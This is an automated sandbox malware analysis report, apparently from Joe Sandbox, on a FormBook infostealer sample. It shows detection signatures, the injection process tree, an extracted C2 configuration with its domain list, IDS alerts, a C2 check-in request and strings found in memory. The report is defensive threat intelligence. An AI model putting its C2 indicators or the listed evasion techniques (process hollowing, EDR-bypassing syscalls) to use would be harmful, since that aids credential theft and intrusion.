
Windows Analysis Report
n0srYVYMDI.exe

Overview

General Information

Sample name: n0srYVYMDI.exe (renamed because the original name is a hash value)
Original sample name: 067d0a32b11208193e232f3b4d05b24f0d730ffb23049a1611be068738b9d11c.exe
Analysis ID: 1587617
MD5: 7d311cdceda373fd94310919b7bdc784
SHA1: 9e1504e3148829775ef7d1c80095dda1fb725e73
SHA256: 067d0a32b11208193e232f3b4d05b24f0d730ffb23049a1611be068738b9d11c
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • n0srYVYMDI.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\n0srYVYMDI.exe" MD5: 7D311CDCEDA373FD94310919B7BDC784)
    • n0srYVYMDI.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\n0srYVYMDI.exe" MD5: 7D311CDCEDA373FD94310919B7BDC784)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 7796 cmdline: "C:\Windows\SysWOW64\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 7840 cmdline: /c del "C:\Users\user\Desktop\n0srYVYMDI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.ehills.shop/m25s/"], "decoy": ["araghospitality.net", "cleans.xyz", "olnacasinotcs14.top", "pringhillinfos.net", "erkakasrumah.online", "orean-course-289113002.zone", "yeloma-treatment-82106.bond", "76iw543gw.autos", "nline-shopping-56055.bond", "enetik.xyz", "ax-th-6011838.fyi", "itygatehousing.app", "23zy998jk.bond", "pslag-hal-2.online", "uykoii.shop", "9supjub3p.buzz", "tmgl.bond", "actus-catering-creations.net", "ntercashspace24.homes", "ierra777.vip", "ental-health-69511.bond", "newordforpurpose.info", "roppsple.shop", "edant.ltd", "imitake.xyz", "ransportationmwmptpro.top", "roncrow.biz", "armanshop.xyz", "ealthy-life-products.online", "raphic-design-degree-33148.bond", "ildcraft.xyz", "16-lawn-care.today", "7732.club", "vitor.live", "uy-smart-tv-nl.today", "sone.best", "ellcli.net", "52006.club", "abelzshop.online", "cctofi.cpa", "alisu.xyz", "roformance.shop", "cskuvq.shop", "anforexuytin.cfd", "raceg.cyou", "rimevest-global.info", "ealthcare-trends-60670.bond", "oo.bio", "itodemo.click", "ottah.studio", "teamgame-mod.net", "39474.club", "yai11.top", "onnorbell.design", "dt5r.shop", "6874.club", "wistlnc.net", "ntermoney24cad.homes", "attoomasteracademy.online", "3win4.cyou", "xewaov.xyz", "6uzh.digital", "ransportationwlsltpro.top", "oches-a-credito-es.bond"]}
Source | Rule | Description | Author
00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
Source | Rule | Description | Author
2.2.n0srYVYMDI.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.n0srYVYMDI.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.n0srYVYMDI.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
2.2.n0srYVYMDI.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
2.2.n0srYVYMDI.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T15:51:40.551018+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50007 | 103.224.212.213 | 80 | TCP


          AV Detection

Source: n0srYVYMDI.exe | Avira: detected
Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook (same C2 list and decoy domains as the configuration shown above)
Source: n0srYVYMDI.exe | Virustotal: Detection: 70%
Source: n0srYVYMDI.exe | ReversingLabs: Detection: 82%
Source: Yara match | File source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: n0srYVYMDI.exe | Joe Sandbox ML: detected
Source: n0srYVYMDI.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: n0srYVYMDI.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmd.pdbUGP source: n0srYVYMDI.exe, 00000002.00000002.1787623438.0000000001690000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: n0srYVYMDI.exe, 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1787115102.0000000003845000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1789350991.00000000039F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: n0srYVYMDI.exe, n0srYVYMDI.exe, 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, cmd.exe, 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1787115102.0000000003845000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1789350991.00000000039F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: n0srYVYMDI.exe, 00000002.00000002.1787623438.0000000001690000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, cmd.exe, 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_0025589A FindFirstFileExW, GetLastError, GetProcessHeap, HeapAlloc, GetProcessHeap, HeapReAlloc, FindNextFileW, FindClose, GetLastError, FindClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_00250207 FindFirstFileW, FindClose, memcpy, _wcsnicmp, _wcsicmp, memmove
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_00263E66 FindFirstFileW, FindNextFileW, FindClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_00254EC1 memset, FindFirstFileW, FindClose, FindFirstFileW, FindNextFileW, FindClose, ??_V@YAXPAX@Z, GetLastError, SetFileAttributesW, _wcsnicmp, GetFullPathNameW, SetLastError, GetLastError, SetFileAttributesW
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_0024532E GetFileAttributesW, GetLastError, FindFirstFileW, GetLastError, FindClose, memset, ??_V@YAXPAX@Z, FindNextFileW, ??_V@YAXPAX@Z, SetLastError, ??_V@YAXPAX@Z, GetLastError, FindClose
Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 0_2_07D071F4 4x nop then jmp 07D07B49h
Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 0_2_07D0716B 4x nop then jmp 07D07B49h
Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_00407B1B 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_02F67B1B 4x nop then pop ebx

          Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50007 -> 103.224.212.213:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50007 -> 103.224.212.213:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50007 -> 103.224.212.213:80
Source: Malware configuration extractor | URLs: www.ehills.shop/m25s/
Source: DNS query: www.armanshop.xyz
Source: unknown | DNS traffic detected: query: www.ransportationmwmptpro.top, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.uy-smart-tv-nl.today, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.ental-health-69511.bond, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.onnorbell.design, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.raceg.cyou, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.armanshop.xyz, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.wistlnc.net, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.cctofi.cpa, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.orean-course-289113002.zone, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.ealthcare-trends-60670.bond, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.ehills.shop, reply code: Name error (3)
Source: global traffic | HTTP traffic detected: GET /m25s/?RR=ejXsf9CDJtAn3y938lXanCHlJWOupDiK8G2VK70kBEvHSxoyO9pX1brU4xQC+L5tXqcG&2d2x=dTjPadN8ifyHSjI HTTP/1.1 | Host: www.vitor.live | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 103.224.212.213
Source: Joe Sandbox View | ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: C:\Windows\explorer.exe | Code function: 3_2_10DC3F82 getaddrinfo, setsockopt, recv
Source: global traffic | DNS traffic detected: DNS query: www.ealthcare-trends-60670.bond
Source: global traffic | DNS traffic detected: DNS query: www.ental-health-69511.bond
Source: global traffic | DNS traffic detected: DNS query: www.wistlnc.net
Source: global traffic | DNS traffic detected: DNS query: www.armanshop.xyz
Source: global traffic | DNS traffic detected: DNS query: www.ehills.shop
Source: global traffic | DNS traffic detected: DNS query: www.uy-smart-tv-nl.today
Source: global traffic | DNS traffic detected: DNS query: www.vitor.live
Source: global traffic | DNS traffic detected: DNS query: www.raceg.cyou
Source: global traffic | DNS traffic detected: DNS query: www.cctofi.cpa
Source: global traffic | DNS traffic detected: DNS query: www.onnorbell.design
Source: global traffic | DNS traffic detected: DNS query: www.orean-course-289113002.zone
Source: global traffic | DNS traffic detected: DNS query: www.ransportationmwmptpro.top
Source: explorer.exe, 00000003.00000000.1732979117.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000000.1732979117.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000000.1732979117.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000000.1732979117.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000002.4175505713.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4174803690.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4177373939.0000000009B60000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.39474.club
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.39474.club/m25s/
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.39474.club/m25s/www.oches-a-credito-es.bond
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.39474.clubReferer:
Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.armanshop.xyz
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.armanshop.xyz/m25s/
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.armanshop.xyz/m25s/www.ehills.shop
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.armanshop.xyzReferer:
Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cctofi.cpa
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cctofi.cpa/m25s/
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cctofi.cpa/m25s/www.onnorbell.design
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cctofi.cpaReferer:
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ealthcare-trends-60670.bond
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ealthcare-trends-60670.bond/m25s/
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ealthcare-trends-60670.bond/m25s/www.ental-health-69511.bond
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ealthcare-trends-60670.bondReferer:
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ehills.shop
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ehills.shop/m25s/
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ehills.shop/m25s/www.uy-smart-tv-nl.today
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ehills.shopReferer:
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ental-health-69511.bond
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ental-health-69511.bond/m25s/
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ental-health-69511.bond/m25s/www.wistlnc.net
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bondReferer:
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
